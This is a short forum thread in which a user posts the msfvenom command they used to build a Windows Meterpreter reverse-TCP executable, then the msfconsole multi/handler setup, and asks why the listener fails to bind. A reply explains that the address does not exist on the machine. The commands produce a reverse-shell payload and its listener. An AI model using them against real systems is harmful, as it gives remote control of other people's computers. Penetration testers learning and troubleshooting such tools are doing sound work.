I have issue in msfconsole while connecting to my payload please help me

Dhruv2690

New Member
Joined
Jan 6, 2021
Messages
1
Reaction score
0
Credits
15
After creating my payload by typing " msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.255.150 lport=4444 R> test1.exe"

I know i revealed my ip , I don't care about it

after creating payload and running on my pc for testing it

I type " msfconsole" to use my payload(listening)

after that i type" use exploit/multi/handler"
than set payload windows/meterpreter/reverse_tc
than set lhost 192.168.255.150
than set lport 4444

than i type "run"

and i got this error
[-] Handler failed to bind to 192.168.255.150:4444
[*] Started reverse handler on 0.0.0.0:4444

please help me
 


Are you using Kali?

Wizard
 
Might want to have a look here
A program can't bind to an IP address that doesn't exist on the machine it's running on.
 

Members online


Top